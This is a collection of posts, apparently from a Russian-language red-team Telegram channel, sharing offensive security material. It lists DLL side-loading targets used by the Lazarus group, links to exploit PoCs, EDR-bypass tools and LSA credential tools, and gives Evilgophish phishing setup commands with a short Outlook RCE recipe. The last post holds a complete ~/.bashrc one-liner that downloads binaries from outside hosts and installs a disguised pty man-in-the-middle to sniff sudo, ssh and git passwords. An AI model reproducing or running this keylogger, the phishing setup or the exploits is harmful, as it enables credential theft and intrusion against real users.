Список DLL, которые использует группа Lazarus:

Missing DLL:
spoolsv.exe ➡️ ualapi.dll

Side-loaded:
mobsync.exe ➡️ propsys.dll
MDEServer.exe ➡️ winmde.dll
ComcastVNC.exe ➡️ version.dll
colorcpl.exe ➡️ colorui.dll
presentationhost.exe ➡️ mscoree.dll
CameraSettingsUIHost.exe ➡️ DUI70.dll
wsmprovhost.exe ➡️ mi.dll
SgrmLpac.exe ➡️ winhttp.dll
TieringEngineService.exe ➡️ ESENT.dll
WmiApSrv.exe ➡️ wbemcomn.dll
dfrgui.exe ➡️ SXSHARED.dll
SyncHost.exe ➡️ WinSync.dll
wmiprvse.exe ➡️ ncobjapi.dll
wmiprvse.exe ➡️ wbem\sspicli.dll
wmiprvse.exe ➡️ wbem\wmiclnt.dll
svchost.exe(IKEEXT) ➡️ wlbsctrl.dll

#apt #redteam #dllhijack #maldev

Подготовил исследование шелл-кода загрузчика Badger BRC4. В данной статье описаны алгоритм хэширования API, процесс расшифрования основной полезной нагрузки и конфигурации.

https://teletype.in/@threathunt_pedia/EBYsz4Z_DOU

Что нового: алгоритм хеширования схож с модулями CobaltStrike, используются низкоуровневые функции для обхода AV/EDR. В следующем меатериале разберу основную нагрузку DLL Badger BRC4.

#reverse #bruteratel

Качественный разбор, но жаль что версии 1.2.2. Если у кого есть свежая версия, или другая интересная малварь, кидайте админу того канала @rayhunt454. Говорит, что оформит разбор))

@Michaelzhm прислал статейку) Нового ничего нет, но если кто не знал про данную технику из категории Blind EDR, то вам понравится... Достигается путём изменения значения альтитуды минифильтра и перекрытия коллбэков EDR.

https://tierzerosecurity.co.nz/2024/03/27/blind-edr.html

#bypass #evasion #edr #redteam #maldev

😈 [ Zoro @Evi1cg ]

atexec-pro

🔗 https://github.com/ridter/atexec-pro
🔗 https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.3_from_RPC_to_lateral_movement.html

🐥 [ tweet ]

люблю такой креатив

Большая коллекция BOF'ов для работы с MSSQL

https://github.com/Tw1sm/SQL-BOF

#redteam #bof #cobaltstrike

Оставлю тут🫣, популярный дистрибутив все-таки....

UPD. Как я понял, не только Kali пострадала🤔

UPD2. Ещё и на Маках...

В этой заметке хочу рассказать про новую платформу Xintra - APT Emulation Labs, которая позиционируется как площадка для прокачки навыков IR against APT-level threats.
Я уже несколько раз писал про платформы для обучения и совершенствования навыков защитников, поэтому еще одна точно лишний не будет😎

➕На данный момент площадка представляет собой лабораторное окружение в веб-интерфейсе с 3 лабами имитирующими Incident Response кейсы по отработке различных навыков на примере атак APT-29🐻, APT-10🐼, AlphV (BlackCat)🐈‍⬛
➕ Каждая лаба состоит из 40-60 вопросов, на которые предстоит ответить при расследовании инцидента
➕ Со слов разработчиков на решение каждой лабы потребуется 30-40 часов для опытных аналитиков SOC и 60-70 часов для новичков

➖7 дневная триалка только после привязки карты
➖минимальная стоимость подписки - 45$/мес

Таким образом, платформ для прокачки навыков защитников становится больше и это радует👍 А если хочется сначала понять зайдет-не зайдет рекомендую посмотреть на бесплатную defbox.io

🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!

A brief instruction for red teams:

1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!

No back connect required!

🔥 📐📏

#maldev #redteam

Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.

1. Собираем проект ./compile.sh
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса: .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

https://github.com/Helixo32/CrimsonEDR

CVE-2024-21338: Windows Admin-to-Kernel LPE

Уязвимы Windows 10 & 11

PoC: https://github.com/hakaioffsec/CVE-2024-21338

Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/

#lpe #windows #exploit #redteam

Ну это прям реально полный гайд по Bloodhound CE. Для тех, кто ещё старым пользуется.

https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf

#pentest #enum #bloodhound

Ой, красота))) Получить данные из LSA без дампа LSASS.

Tool: https://github.com/EvanMcBroom/lsa-whisperer

Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b

#redteam #pentest #creds #dump

Windows Admin to Kernel (KSecDD driver)

https://github.com/floesen/KExecDD

#lpe #kernel #redteam

CLI tool (python) for managing Cortex XDR
* changing rules
* restarting the XDR process
* disabling the local analysis engine
* inserting any python code to run

https://github.com/SafeBreach-Labs/CortexVortex

#edr #redteam #bypass

В продолжении темы про подготовку Red Teaming инфраструктуры для проведения социо-технических этапов тестирований aka фишинга для получения первоначального доступа, обычно используется Evilgophish от fin3ss3g0d.

По сути это форк оригинальных Evilginx и Gophish с расширенной функциональностью, о котором я уже неоднократно писал и рассказывал. Этот инструмент прямо из коробки позволяет настроить использование Cloudflare Turnstile в качестве эффективного решения для противодействия ботам и автоматизированным сканерам, которое в отличии от классических решений CAPTCHA с выбором картинок и набором текста совсем не влияет на UX😎

В блоге автора подробно описано каким образом настроить Cloudflare Turnstile:
✅ Необходимо просто зарегать учетку Cloudflare (бесплатный уровень подписки), добавить домен фишинговой страницы и скопировать ключи для использования сервиса

./evilginx3 -feed -g ../gophish/gophish.db -turnstile <PUBLIC_KEY>:<PRIVATE_KEY>

✅ Поменять дизайн дефолтных страниц с антибот-проверкой evilginx3/templates/turnstile.html и 403 Forbidden evilginx3/templates/forbidden.html, LLM справится с этой задачей за 3 секунды🙈
✅ Let's go phishing🎣

К тому же злоумышленники уже давно используют эту технологию, поэтому по моему мнению очень важно проверить во время тестирований насколько используемые средства защиты и процессы в вашей организации позволяют противостоять подобным угрозам на практике.

#phishing #evilgophish #cloudflare_turnstile

SilverPotato...

https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/

#potato #pentest #redteam

😈 [ The Hacker's Choice (@[email protected]) @hackerschoice ]

A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'

🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

🐥 [ tweet ]

прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger